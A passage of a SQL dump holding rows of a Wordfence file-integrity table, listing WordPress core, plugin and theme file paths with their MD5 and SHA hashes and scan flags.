(0x63a6fad2bdf005fd561c2508246ee9cc, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_wp_recentcomments.php', 0, 0x1e3bce66bdd2ee5f89c56c6626094fb3, 0x1e3bce66bdd2ee5f89c56c6626094fb3, 0x14cbd20630b546ecebde5de78f2e6d85ae1bea0c6876ab80725883aba9efb601, '', 0, '?'),
(0x63ae5accce0367be18a77b7c153127ec, 'wp-content/themes/Impreza/framework/admin/functions/demo-import.php', 0, 0xa9bd88e41a0c315ffa398c62fe6fe5b7, 0xa9bd88e41a0c315ffa398c62fe6fe5b7, 0xa47407ae285b931fe0f8b8b8d73440cfb9ea6a2fb767d350c3626a49c9d49b2c, '', 0, '?'),
(0x63afb2ac7cc1f8ae99207b025c06dbbb, 'wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/deprecated/tabs/vc_tour.js', 0, 0x3a4a625a5e4d1404c93fe7c169159620, 0x3a4a625a5e4d1404c93fe7c169159620, 0xd55206c5c083cfe20a0031243b595d5d2893927adbab4784e0397ff2c1e6a5fd, '', 0, '?'),
(0x63d04b24d50cc31ae624fd0093b16c4d, 'wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/charts/vc_pie.js', 0, 0x7cb058df163d83981a2de7b286d1accf, 0x7cb058df163d83981a2de7b286d1accf, 0x6923ce19bad0ada09b1ee98b997aff017843c9f54bc4b250c0f607addd489d3a, '', 0, '?'),
(0x63f163a9b6baabaac00f670e75cee4cc, 'wp-content/plugins/wordfence/vendor/geoip2/geoip2/LICENSE', 1, 0x00000000000000000000000000000000, 0x3b83ef96387f14655fc854ddc3c6bd57, 0xddacef491153f45022f5619519bb2016374a8c36e75153768493f45fb38d7992, '', 0, '?'),
(0x63f58099b699d2fe570592f75a71dc86, 'wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_florist_24px.svg', 0, 0x54e1591783ae2a55fd691b928df41fbd, 0x54e1591783ae2a55fd691b928df41fbd, 0xbe1a2ead0f3207719f4e626adbe87984cd8050fbe039dbdd5bdde7e2769bceb9, '', 0, '?'),
(0x63fa949a1e5734b328809eab7a052c49, 'wp-content/plugins/js_composer/include/params/colorpicker/colorpicker.php', 0, 0xc87813b7640db9424f70501357acbad5, 0xc87813b7640db9424f70501357acbad5, 0x095a39c61df1ca15d42c0c8f7a388295e5fb18834afbdf44f8bc989d295b3f40, '', 0, '?'),
(0x63fe06865b625dcbc005feddbd874a46, 'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/storage.php', 1, 0x00000000000000000000000000000000, 0xbc8e4a065cd41e04b6f61b809f34abe8, 0x21ca81b829776ab925e0a8f4e570d5bbda9e35ed3671e8a28c6dacb223cff577, '', 0, '?'),
(0x6402f5e53a77a4eed04fcdd086171513, 'wp-includes/ID3/getid3.php', 1, 0x00000000000000000000000000000000, 0x9a22047b27152fb5e7060527f68f5018, 0x5c9c944db4eade64389781bff55ef41bbd0ca21d1b6b4c294abb8859d0af27b3, '', 0, '?'),
(0x640be3ecad31edecb5932d853b4f98f6, 'wp-admin/js/custom-background.js', 1, 0x00000000000000000000000000000000, 0xcc358c331f8258166040ec13020cac1f, 0x412b45ec8b735e5437cee896e088b12140ed4acf6be81e21275ffa3dc66ce008, '', 0, '?'),
(0x6416138bacbbf4686788553f0bddb010, 'wp-content/plugins/Ultimate_VC_Addons/templates/pricing/index.php', 0, 0xb82dc7457005bb698e35f7185a1f5612, 0xb82dc7457005bb698e35f7185a1f5612, 0x4ccb304a2d238a28edc684aa33d7e57db82c36f95eaa53e0b5a7453cbb29803c, '', 0, '?'),
(0x6447ddf18029b6e5193bfc0181c04fc7, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/buy-sign.svg', 0, 0x903d3fb349d74fcb1ff554dc50a9bee6, 0x903d3fb349d74fcb1ff554dc50a9bee6, 0xfd724c35f1009eb9165fb09e5e70a68be31373ef6a554ef59242c1940252bbbf, '', 0, '?'),
(0x6450a6aa32bb673f075abc708ac7f33a, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/send.svg', 0, 0x958f0f694f818316f34b21c96bedcded, 0x958f0f694f818316f34b21c96bedcded, 0xd332fba83bba0757781da4471c3dbea45457c6c701e58bf13c8a57b312ed6aaf, '', 0, '?'),
(0x64571bb64de8e2e6d029f5f881a767a5, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_switch_camera_24px.svg', 0, 0x4b7c5ee2e0fbe63968a4bdaf2c123153, 0x4b7c5ee2e0fbe63968a4bdaf2c123153, 0x9ddc9110ad7205ffd98a79aa44ab6fced7dc9a32887b1a12bdcaaea3c6fdc046, '', 0, '?'),
(0x645c1a2bf0d1ee9afa976a2b9f690336, 'wp-content/plugins/revslider/admin/assets/js/codemirror/util/searchcursor.js', 0, 0xae64a29e4e6046b5dcbcddd6df2c35fa, 0xae64a29e4e6046b5dcbcddd6df2c35fa, 0xaf3b10decb18bbd242a48eb7993fbae45eeaa69d7163b6873a7db9eb230c2b66, '', 0, '?'),
(0x647f5ae7707a3b22b8fc4833ef6355dc, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/certificate.svg', 0, 0xea2a3bb9434d194329d099b084fae22a, 0xea2a3bb9434d194329d099b084fae22a, 0xb474e096e046c9158c4e51236cbb5dcce142dcb2804c5827675c00fdc5b569d6, '', 0, '?'),
(0x64888e81daf261b449f5e6e4fa09daa6, 'wp-content/plugins/Ultimate_VC_Addons/admin/bsf-core/assets/js/license-form-popup.js', 0, 0x11135d7f01ab63ceb778e7392ba8e51b, 0x11135d7f01ab63ceb778e7392ba8e51b, 0x9ca50e233f0811bc49045b33acb5430021f03450c86b13a3c58b2226fc1bf22c, '', 0, '?'),
(0x64956bf2fb914a51417736696d3c4231, 'wp-content/plugins/wordfence/modules/login-security/wordfence-login-security.php', 1, 0x00000000000000000000000000000000, 0x746bf7db892981d15b82407e49dbc7e4, 0xace283a85633d251879b5dbec2c26f21e6764c7102aa3adede277e8e00fb272f, '', 0, '?'),
(0x6498a3851741751b68c5eaa0303431e1, 'wp-includes/blocks.php', 1, 0x00000000000000000000000000000000, 0xefa2a421373194c7b300e04d22fe279d, 0x696b3a30fe274e75336f9fd8f58e0c808f5d2b0161ca9d18f09cad8dcfdf3954, '', 0, '?'),
(0x649f668aaf9eb3a34cb8f79cfae9b54e, 'wp-content/plugins/revslider/admin/assets/imports/parallaxscene/index.php', 0, 0xd41d8cd98f00b204e9800998ecf8427e, 0xd41d8cd98f00b204e9800998ecf8427e, 0xe3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855, '', 0, '?'),
(0x64ae46dc490ac75d320ae811f754670c, 'wp-content/plugins/js_composer/config/grids/shortcode-vc-media-grid.php', 0, 0x799eebdb67ddc3cecc0eefcd37b57db8, 0x799eebdb67ddc3cecc0eefcd37b57db8, 0x42fd20c50bd194c7ef4738a6275f8b157e23b24ddaef1cc14da7d94d691fef69, '', 0, '?'),
(0x64c330c0d9b71ac9c7e8f3f013d48c6e, 'wp-content/plugins/wordfence/views/scanner/issue-wafStatus.php', 1, 0x00000000000000000000000000000000, 0xe43c338d387875465296c496c8a6f945, 0x6ebcb31e17193f51d5eb627a09ac8b03d9a2e52911dc05fc532afb922c5aeeb4, '', 0, '?'),
(0x64d52819c4c8254ae9f9de40f5478610, 'wp-admin/options.php', 1, 0x00000000000000000000000000000000, 0xfb79046e16165088b2c9a0059f2d98fb, 0x032eb175fda7b8175c0a80781fe8e6c0880929cc574ae36346a4b3495182fbc8, '', 0, '?'),
(0x64e1f191e4b5f5fbc1abcd90a9ff57f0, 'wp-content/plugins/wp-super-cache/languages/wp-super-cache-zh_TW.mo', 1, 0x00000000000000000000000000000000, 0x698c4150b65e9ab28105509bcd0b4dee, 0x9dee4123552f670272d61eab0ae1e54d9af80b0096c9f623df6dc62433afd731, '', 0, '?'),
(0x64e2ba68c4a77b71348732f74b2218df, 'wp-includes/SimplePie/Rating.php', 1, 0x00000000000000000000000000000000, 0x3d7013a46d09c74b0ee3d8af617412fb, 0x970d5bb96ab26a06d582e0a572568568609de64672455388b4ddd60c7b621d91, '', 0, '?'),
(0x64e8348f6ae0320b55c2568eb724f650, 'wp-admin/css/wp-admin.css', 1, 0x00000000000000000000000000000000, 0x96372351aa264d3fc2bb87f97c1ff35b, 0x51c344a6a0cc36a6b99b6850d6c2cc71714d39cf024690044fda0bd21e5c4f96, '', 0, '?'),
(0x64e888400c21edc664a74a8f1580c5fb, 'wp-includes/js/mediaelement/mejs-controls.png', 1, 0x00000000000000000000000000000000, 0x872edbb75a23651c30bf3ca06c9690bf, 0x9b157f58e32ae1ee1abb8e155801db28de5a1521ebb7c8bda8f1441401326142, '', 0, '?'),
(0x6500c0cdfd9e68f34c89fa89d189b8e7, 'wp-content/plugins/wordfence/lib/email_unsubscribeRequest.php', 1, 0x00000000000000000000000000000000, 0xbc237db45fb42a6d44c39763767f8a57, 0x079d6d892447fdf32b35395445fb780237427bcaec952fc4e02c75eed637ad0c, '', 0, '?'),
(0x650df79a105a668b89c5de9ecac97cef, 'wp-includes/js/api-request.min.js', 1, 0x00000000000000000000000000000000, 0x8a0fadfcd419986aede647b929822406, 0x4b9a8619ed115fa65e4dc155430d06630a8bfe4bd0edcee4e5bfffb2738ee74c, '', 0, '?'),
(0x6510f28a517912f87c682e238fbaa779, 'wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_refresh_24px.svg', 0, 0x61770d7dae4f0d71ef73455000554048, 0x61770d7dae4f0d71ef73455000554048, 0x486e3b584e01f2de651e94a369405613b2448e48c11b2ddcb12427894e5618c7, '', 0, '?'),
(0x6515c7eccc58c78c2e5cec281626fd64, 'wp-content/plugins/wordfence/views/scanner/issue-coreUnknown.php', 1, 0x00000000000000000000000000000000, 0xe5d8b16d193a68f30d471d5aaada8b59, 0x74380375559fb70e55fbf153c492aa7166be94ace7530f9f33699cbd8e69f675, '', 0, '?'),
(0x6522a45953f74feb2da91d2ed1a909cd, 'wp-content/plugins/revslider/public/assets/js/extensions/index.php', 0, 0xd41d8cd98f00b204e9800998ecf8427e, 0xd41d8cd98f00b204e9800998ecf8427e, 0xe3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855, '', 0, '?'),
(0x6528646828af6d4da9fd3c0ce64e7f88, 'wp-content/plugins/Ultimate_VC_Addons/assets/index.php', 0, 0xb82dc7457005bb698e35f7185a1f5612, 0xb82dc7457005bb698e35f7185a1f5612, 0x4ccb304a2d238a28edc684aa33d7e57db82c36f95eaa53e0b5a7453cbb29803c, '', 0, '?'),
(0x652ac0840e6ed956663309a4a837d777, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_audiotrack_24px.svg', 0, 0xd46012b338a4e13454c3aab8de9e2d52, 0xd46012b338a4e13454c3aab8de9e2d52, 0x053892903c650c6b49d83f9e5b918406f86c938c30aaef60c4d7c8793ad5aef0, '', 0, '?'),
(0x652e50c8b44e42875378115bdb26c1bc, 'wp-admin/includes/class-wp-plugin-install-list-table.php', 1, 0x00000000000000000000000000000000, 0x80bf220516cc089c067c2db3f41097bb, 0x48d44d4318dae93f2cbaca7d473a2928cd67f0210685ec4d0d5cf1302ad0ed96, '', 0, '?'),
(0x6537e35db663366451db485904001b2e, 'wp-content/plugins/Ultimate_VC_Addons/admin/vc_extend/js/vc-hotspot-param.js', 0, 0x4e011171e41f8c989cfca9ea039338b0, 0x4e011171e41f8c989cfca9ea039338b0, 0x9aa23323772aaa7abb19b354df736751d7e7131cf7ac4937e72ce44826293820, '', 0, '?'),
(0x6549510258c11b7df09b2da3ec8c6525, 'wp-content/plugins/js_composer/assets/vc/loaders/spinner.svg', 0, 0x74ed964bef6afbdf14a35a1bf1fb0585, 0x74ed964bef6afbdf14a35a1bf1fb0585, 0x397e3039c72c91fdb73c8663440f5952588184b8319a2e35c74eab460b69abc2, '', 0, '?'),
(0x65699b8779eff8cc2c3ab6eae154d929, 'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Country.php', 1, 0x00000000000000000000000000000000, 0x00a651902332d08f1291b4f35280b495, 0x7e164729e25217a1b3ea8137692deb23e2de0752203948b016fec7abf7200362, '', 0, '?'),
(0x65700d7dc8755f348ffdbf91b1f3969f, 'wp-content/plugins/wordfence/views/scanner/issue-checkSpamIP.php', 1, 0x00000000000000000000000000000000, 0x9cded8f060589b63c16237b5714e538a, 0x8b4dfab7c947fb5d20e93f7593bf671250e37031cb2ca328cb56b05e7fb4f4d0, '', 0, '?'),
(0x6577cb3deac1329470b9ec598dde1939, 'wp-content/plugins/Ultimate_VC_Addons/woocomposer/admin/index.php', 0, 0x4c1b544292f282cbb84ac7e5d95413ef, 0x4c1b544292f282cbb84ac7e5d95413ef, 0x4ccb304a2d238a28edc684aa33d7e57db82c36f95eaa53e0b5a7453cbb29803c, '', 0, '?'),
(0x657d3077546e7604025ff367a717137e, 'wp-content/plugins/wordfence/views/scanner/options-group-basic.php', 1, 0x00000000000000000000000000000000, 0x7f8c1f022cac7a370a17fec9b2d7df9e, 0x41bfba8c622e684e91f86881fa7cf68b903a481c2dae3dba8a28a71c3166894a, '', 0, '?'),
(0x65aa986c73554f7c13b0527ddc9d9369, 'wp-includes/sodium_compat/src/Crypto32.php', 1, 0x00000000000000000000000000000000, 0x490d7d6a8cc78a51585d6d93020c04ff, 0xc9b1f9c5e4b183466ef79ebb9d32632e6e0618df4db115eddaa3b22041bfb5bf, '', 0, '?'),
(0x65aee45f175ff325f717e8ae7888c0db, 'wp-includes/class-snoopy.php', 1, 0x00000000000000000000000000000000, 0x73b05cdec5859ff6edcfbcd22ebd0960, 0x8096f334092af200d1e289fe05e8fca80afe86e03b3072a3fb9db5fac9b7779d, '', 0, '?'),
(0x65bd065e237cdb8da254d0a99288107a, 'wp-includes/Text/Diff/Engine/xdiff.php', 1, 0x00000000000000000000000000000000, 0xd6b91fc8628a0c0474ad58389a475815, 0x1efa5b3ca130b0c48597bf614429744afb68edbf28439b5b75487d73d2986984, '', 0, '?'),
(0x65cddb5bd9ab77666fa2320eab658b85, 'wp-content/themes/Impreza/single-us_portfolio.php', 0, 0xa2c9198bf3faa380e90420b85aed5e54, 0xa2c9198bf3faa380e90420b85aed5e54, 0x68f7c1aa2f8124da9a0737508e33861cc3ecd9d0afaa1aa37c811d71f2527e2e, '', 0, '?'),
(0x65e0f9e603be15c1877c158e8b36291e, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_4_bar_lock_24px.svg', 0, 0x9b9e5d6abc305e50abd3af9aa52dcc6d, 0x9b9e5d6abc305e50abd3af9aa52dcc6d, 0x3ed07177e8cd46920562d53620a0b01c915af8f37cd3478fb76f517b2b4c0f6f, '', 0, '?'),
(0x65faa25069378d2babd624c8001f66f6, 'wp-content/plugins/revslider/public/assets/assets/svg/content/ic_filter_list_24px.svg', 0, 0xe2b052f552ea054dfcb2e9932ed149b8, 0xe2b052f552ea054dfcb2e9932ed149b8, 0x19c78824ecaf49a89f842ce8ef301627b5a0a859930c6b8aac9dc0db4ff6058d, '', 0, '?'),
(0x660ce06b55434ded000fbf773ff52681, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_cellular_connected_no_internet_4_bar_24px.svg', 0, 0xb955b313007b0d3e55a614bf79b508fb, 0xb955b313007b0d3e55a614bf79b508fb, 0x56fb0ec974fa6f0a299092562f34b1efc15e2ae134f647db7d5f9d3541969aa2, '', 0, '?'),
(0x66176e0f46faf542fbca45ab6fc978cf, 'wp-content/plugins/revslider/admin/assets/images/mainoptions/index.php', 0, 0xd41d8cd98f00b204e9800998ecf8427e, 0xd41d8cd98f00b204e9800998ecf8427e, 0xe3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855, '', 0, '?'),
(0x6624a6206dadbc66b68f4154ce71caf7, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-section.php', 0, 0x5870340392a37da2688c211b98599bbb, 0x5870340392a37da2688c211b98599bbb, 0x24a2b20f15664ccb4b3f14b575946a348572d3fe62d518a18e1e16e07a42f50c, '', 0, '?'),
(0x663540b8fe5daec1a0a15eeb1f7fec97, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/character04.svg', 0, 0xb0857f8d9068c97728858ef87f8722b7, 0xb0857f8d9068c97728858ef87f8722b7, 0x6ebc065a350c878645c0583c1bc2373df4a34f10dd7f94a534d4cd2823542e61, '', 0, '?'),
(0x6661642bd371b514e9434b5381836715, 'wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_speaker_24px.svg', 0, 0xf7fe6a0f62c5734110afcc1a9a19a3ec, 0xf7fe6a0f62c5734110afcc1a9a19a3ec, 0x9f73858019176c65f74a8f7675f9f65bf9b538d7b64c857edf4d5ca8b1e279a7, '', 0, '?'),
(0x667086fa93eae7c86af3489b1105271d, 'wp-content/plugins/wordfence/views/blocking/blocking-status.php', 1, 0x00000000000000000000000000000000, 0xc9cbae5fc1ec18cdf5aec6e4586becd0, 0xc3fad0f634ce3e31fc5e8807b8b766ff730ca87bcd712709dea94dedf992a29a, '', 0, '?'),
(0x667239a80e1c7d3217fb45fed94ecad9, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/preson-megaphone.svg', 0, 0x23ebf1e0a423c88b98c4aad560e8ad5f, 0x23ebf1e0a423c88b98c4aad560e8ad5f, 0x62c2311922f4f3ba76ca7d828574193323ba3bf8d5c574a818ca77bdd56706a9, '', 0, '?'),
(0x668575330ab8154d5cc17d362a30ed9e, 'wp-includes/class-wp-customize-setting.php', 1, 0x00000000000000000000000000000000, 0x13242110eb90f08d5ab42da8a5bf108d, 0xa6af51cce4f3c1ad91042f534f572d522b531f7d2ea47d9970e33243765b6d99, '', 0, '?'),
(0x6694dc1313bd556ef9f7fb3df215ff40, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/ruler-compasses.svg', 0, 0xc0c3e83ab90066411ec1de261f735030, 0xc0c3e83ab90066411ec1de261f735030, 0x3b401855385ec58066eefb2ff1d43f8147e414aaa0b860ff96310e59084b7993, '', 0, '?'),
(0x6697a6411eb88f5476fa1bcfa7bdd334, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/folder-online.svg', 0, 0x270cf4278d6652999364f9205cf45e8e, 0x270cf4278d6652999364f9205cf45e8e, 0xafc2191d5f33999993fd343b6a3ae54895beaf736170e54b1d29563b5406e82a, '', 0, '?'),
(0x66a0e99cb066d89f7c68fbb955924c03, 'wp-admin/includes/ms.php', 1, 0x00000000000000000000000000000000, 0x829cff80ba3bcad38b64e4a277874854, 0x79ec202788e3b46906199036c98959161a8d04695fffd4eef4fc447087a05a1e, '', 0, '?'),
(0x66a89dc5addd38aeff3bd173146c5603, 'wp-admin/js/privacy-tools.min.js', 1, 0x00000000000000000000000000000000, 0xc9bd456399000e52825a2a70165b9163, 0x69b69dc657d0343ecd2c96e5fc005bc8c70d742d5f49142574117a9f0d480594, '', 0, '?'),
(0x66b8fcb7996168d51e82e5d6b2601c3b, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/ingots.svg', 0, 0x322af21d81ac8a7a3ec19b8a10e90132, 0x322af21d81ac8a7a3ec19b8a10e90132, 0x9c0eb3e50eb2daf054297d3f66cef433f2b1855bdf0ef7d1b8a424ff9e775aa3, '', 0, '?'),
(0x66ba39b2cb658234351a58aba8b98356, 'wp-content/plugins/Ultimate_VC_Addons/modules/ultimate_carousel.php', 0, 0x11cb61c8761f1c94c1774f5090fdb4f9, 0x11cb61c8761f1c94c1774f5090fdb4f9, 0xdf07a2efe9a812e70a420db2ae392e3e1d73ac9e6dd1cce100f4522072122509, '', 0, '?'),
(0x66bfb8d9cc0f429c0844ea46720d0d9e, 'wp-includes/Requests/Transport/fsockopen.php', 1, 0x00000000000000000000000000000000, 0x8c3eac72bf878fd616db51481dcb8656, 0x586912df02ffe98e6302f052b22952ddc7a0ce2e9b012311606a6ac58fb8333f, '', 0, '?'),
(0x66c43e9aec30562447af6a75cf3ffcdc, 'wp-content/themes/Impreza/framework/shortcodes/us_scroller.php', 0, 0xa470f6627a4e7169328f9d79c1d17f0a, 0xa470f6627a4e7169328f9d79c1d17f0a, 0x0dfd15a73c33006176d091fb8bc02b7652cdaa95acdb2cc40579c853c6a185f3, '', 0, '?'),
(0x66c5ee5b187f970a39ce81906120f19d, 'wp-content/plugins/wordfence/modules/login-security/css/admin-global.1579191227.css', 1, 0x00000000000000000000000000000000, 0x2da68901e9538405483140936b51d2b1, 0xe90bd55e48326d3ce6187ff44c024190836d094ed2d647ec2949779b973adc44, '', 0, '?'),
(0x66cee4a0d9fdc20865abaa0152b929da, 'wp-includes/SimplePie/Item.php', 1, 0x00000000000000000000000000000000, 0x104510e221fa08437aec008e633cdca7, 0x314b89d536195de614e14c1d99168a15ddb2ffea5d607219d4537b14b7b9556c, '', 0, '?'),
(0x66d688f30cbdf9a6bc56edd4b929e439, 'wp-includes/theme-compat/embed-content.php', 1, 0x00000000000000000000000000000000, 0xf76d27e78989b1546544e2115d704341, 0x4aac15cf91dfb7d060dec5a12b2c1699a06a72e1236551c1e4ab962099e2e2a0, '', 0, '?'),
(0x66d7b588cfc825810f281819d827ad6b, 'wp-content/plugins/wordfence/css/wf-adminbar.1579191227.css', 1, 0x00000000000000000000000000000000, 0xbce630d3c2cdc0c92243cfb7e55462dc, 0x68bb53e498b72a67a37f35b1b929218ffb95087df4bf07426c0b974efe450ce0, '', 0, '?'),
(0x66de8ebfdad677cc11929f233d540f91, 'wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_near_me_24px.svg', 0, 0x08be87e3257cfb06b1338698f77e7517, 0x08be87e3257cfb06b1338698f77e7517, 0x6d0cefe83982bf1de6bd7fdf1627e5dae66fac59f459c301497b0c1be683e872, '', 0, '?'),
(0x6723e92c764d91ff8e8b97df3a0cf5e4, 'wp-includes/js/jquery/jquery.js', 1, 0x00000000000000000000000000000000, 0x49edccea2e7ba985cadc9ba0531cbed1, 0x8d67852f9001696745c8af5de5337636b745274464b93467cf667f0183da3bfc, '', 0, '?'),
(0x672b797289e4d0718480f68044a9b42f, 'wp-includes/vars.php', 1, 0x00000000000000000000000000000000, 0x601eb367adef555f227dfca2e448abcd, 0x60edcc6d288b1230bc567c4117a5065b618c3be4d9463eddf3504783e22a8a1b, '', 0, '?'),
(0x672bb1b7e7774a6f47ffedef0c1f7b62, 'wp-includes/js/dist/vendor/wp-polyfill-formdata.min.js', 1, 0x00000000000000000000000000000000, 0x2ea232d2a383e59441dc21dc56300749, 0xecab0122430e47395ef6e0c8b7ed04311bf4e602618c3ff10b61d6756b601c04, '', 0, '?'),
(0x6751697288fceb98bfa6e9992f21bd9f, 'wp-includes/rest-api/endpoints/class-wp-rest-search-controller.php', 1, 0x00000000000000000000000000000000, 0x917ebf2d85c6b75fb464ce511904fb95, 0x7985108b302a531db9fab120c6aa466e52a0633e792c0141cb2a130c40ee69e6, '', 0, '?'),
(0x67662e424eb496a4273859cfe7e9c6f3, 'wp-content/themes/Impreza/framework/config/embeds.php', 0, 0xb81daa0b5183a8e34022d4ed4e436948, 0xb81daa0b5183a8e34022d4ed4e436948, 0xf1dc8f25520f4afe2307831812d8c8168784b2166160141f1b7a984eecdcf8ea, '', 0, '?'),
(0x677c795f936f342289a958864e9af98f, 'wp-includes/images/smilies/mrgreen.png', 1, 0x00000000000000000000000000000000, 0x2d35c1e05eb1949106d34add6a9d9dda, 0x13c1e6d04d83f167a824b7e6a52b3bbfb200c735d1c903caed48265c45362577, '', 0, '?'),
(0x67916af7ab08ce33210d1d1d9140957d, 'wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_chevron_right_24px.svg', 0, 0xcd2f9b3392021b5c2db2fe25c615a743, 0xcd2f9b3392021b5c2db2fe25c615a743, 0xc988e63e357e442e3531c58defefddbfa240ac38c04bb6e4695272b119d84b27, '', 0, '?');
INSERT INTO `zdenl_wffilemods` (`filenameMD5`, `filename`, `knownFile`, `oldMD5`, `newMD5`, `SHAC`, `stoppedOnSignature`, `stoppedOnPosition`, `isSafeFile`) VALUES
(0x67941a98a0cdc59efe07ed7c71129a28, 'wp-includes/sodium_compat/src/Core32/ChaCha20/Ctx.php', 1, 0x00000000000000000000000000000000, 0xb99ce01d8d1852d13c1f826e49813c7f, 0x9d657d5d54a1a959287fbd7511260df7cf39302b9f189761ee44cfaeb423e9ef, '', 0, '?'),
(0x679424475cbeebb13ba972c4c4cf3158, 'wp-includes/images/wpicons.png', 1, 0x00000000000000000000000000000000, 0x6453fcf875718d91560f5faedce361f4, 0xb6a505de631b06155a5f94c43f6e8d5f9fe74b818b36ebee8e31119d125c7d72, '', 0, '?'),
(0x67b166f63104fbdbb6f279e43b15b45f, 'wp-includes/class-wp-http-proxy.php', 1, 0x00000000000000000000000000000000, 0xb66e8d7af20fe389539eedf0a835c9eb, 0x3643dbd44675c83f94b336cc53c030beb3bdc099a19b6354cdaad4cfa777c8fb, '', 0, '?'),
(0x67b573f415ce1929a1b36dfd01e72505, 'wp-content/plugins/wordfence/views/waf/options-group-whitelisted.php', 1, 0x00000000000000000000000000000000, 0x5669ab014bf9dbb976e97f3f17c19df5, 0x2d9e4c238e917379a6dca5a36a8a1df87377b0421c74c52706d1889e3bb8383d, '', 0, '?'),
(0x67b65d6585d4215e858b28504b90f0cb, 'wp-content/plugins/wordfence/models/common/wfTab.php', 1, 0x00000000000000000000000000000000, 0x3206f60254d47d9a4857273c137d085c, 0x5ac2a57cff73e953cc3865958c33e88b0445d897aa24898c1fd6c6dc9c2d68e5, '', 0, '?'),
(0x67ce64841fdf45e33a36389f5cf66714, 'wp-content/plugins/us-header-builder/config/theme-options.php', 0, 0x38d89b070f89cdcd7ae2c6c91165044e, 0x38d89b070f89cdcd7ae2c6c91165044e, 0x33a06204ee4681e134b52a37e4c5ef0b0a833d612b68fb0127e00d18c2c3b429, '', 0, '?'),
(0x67d017b67e29b27ea573baca9e93fb49, 'wp-admin/includes/class-language-pack-upgrader.php', 1, 0x00000000000000000000000000000000, 0x076b0c4f392bfe72b7ebcf7f592e1539, 0x36e1780c116a0d4f1d8e6566317f985a833fcea6efee41f5f1279970691477ab, '', 0, '?'),
(0x67d358c6dccc38cf8a2d1b41f5d91b2e, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_wp_custommenu.php', 0, 0xbbbae5a6738feca13f90c86b061ac14b, 0xbbbae5a6738feca13f90c86b061ac14b, 0x829c3d5ef12bfdbdf66e5a7c9c40ff9c4e3d99ff5a4b24fc5321e8bc18527827, '', 0, '?'),
(0x67dd86d191421c90cf1d9024d32599bc, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/ruble.svg', 0, 0xbc8cb2ed42fad74edb2352770931407f, 0xbc8cb2ed42fad74edb2352770931407f, 0xd9c7aa6bbb844349d292efd2332398947283ab12f7ab41ed3fd6586760cdfb7f, '', 0, '?'),
(0x67f5e45d6252062588205a1d8ddb45ba, 'wp-includes/js/shortcode.min.js', 1, 0x00000000000000000000000000000000, 0x18e0dd81085ad19822288e41aefbfca9, 0x558594d49266a25a6f74d7dee48b135a425a72414dd241a5407bc894750355a8, '', 0, '?'),
(0x67fe4564c9e331a2d2447dc2c2fc918a, 'wp-includes/js/jquery/ui/autocomplete.min.js', 1, 0x00000000000000000000000000000000, 0xdb0088d80b66d522e8f56921f2f39ff5, 0xcb1e26f41c0aab73849574cf9b40234e67433b61998a3a3785cc5e135058a5d1, '', 0, '?'),
(0x68165a045b81fd803d8197ef7796728c, 'wp-includes/sodium_compat/src/Core32/XSalsa20.php', 1, 0x00000000000000000000000000000000, 0xdc5c999dae94f1f5e03a520e2fe22b05, 0xdec9aba10fff87a8d0f8e7cc3aaabbb66a4eea6d6da9fa86bd52b7aab81b075b, '', 0, '?'),
(0x681a4f686cf806e75ff8cd4c6d2fe5b7, 'wp-includes/class-wp-customize-manager.php', 1, 0x00000000000000000000000000000000, 0x17a6956dfa281f3c7567fa866fdc6211, 0x682850d2e68e9cf1254c9e49717f82ff7bf32af369b3118d59c99d103a7c229c, '', 0, '?'),
(0x682064d11f92eabb8532f602c35fc072, 'wp-includes/functions.wp-styles.php', 1, 0x00000000000000000000000000000000, 0xff473b7c47fe49bd251bfcce9c0f5a67, 0x6dc4c9cff88ea29180ea80a637bcc8d1735d39f96f2810e5dcc351cd6d2c5354, '', 0, '?'),
(0x682b9bcc2b5c07e6ff6c06c2d85bbb8f, 'wp-content/plugins/revslider/admin/assets/js/codemirror/util/match-highlighter.js', 0, 0x96ecd377fc615660e47a8d427857ddc1, 0x96ecd377fc615660e47a8d427857ddc1, 0xcce4abd4da1274f32ba37e452b85f67ac2851edc2c5695c78cf7527301ce104b, '', 0, '?'),
(0x6830582dc869ffbbd5e18d5ecc476038, 'wp-includes/pluggable.php', 1, 0x00000000000000000000000000000000, 0x770f20a4121f48c38f43ceae0b536a28, 0x96ff974ff5c08aa048835347e8dbdb7477b30e9bac3d0dab672a64c21e3488c3, '', 0, '?'),
(0x6834ac8bf22333c7608e2ddd88a822a2, 'wp-admin/profile.php', 1, 0x00000000000000000000000000000000, 0xe065abcd9d5a420e0fb6423561905aa4, 0x2c1ca836493bc5472bd50f708f6203801bb21f6c5a0f6401c1ac94a87963e300, '', 0, '?'),
(0x68405ac9258f52eb9546df3b74695c6d, 'wp-admin/css/login-rtl.min.css', 1, 0x00000000000000000000000000000000, 0x395af750c19e5a0bb9f7e5ed5a0f027d, 0x06a9e549de77be26268d8800d1621f3bcd48593c498b507d898b73e90c21ab3a, '', 0, '?'),
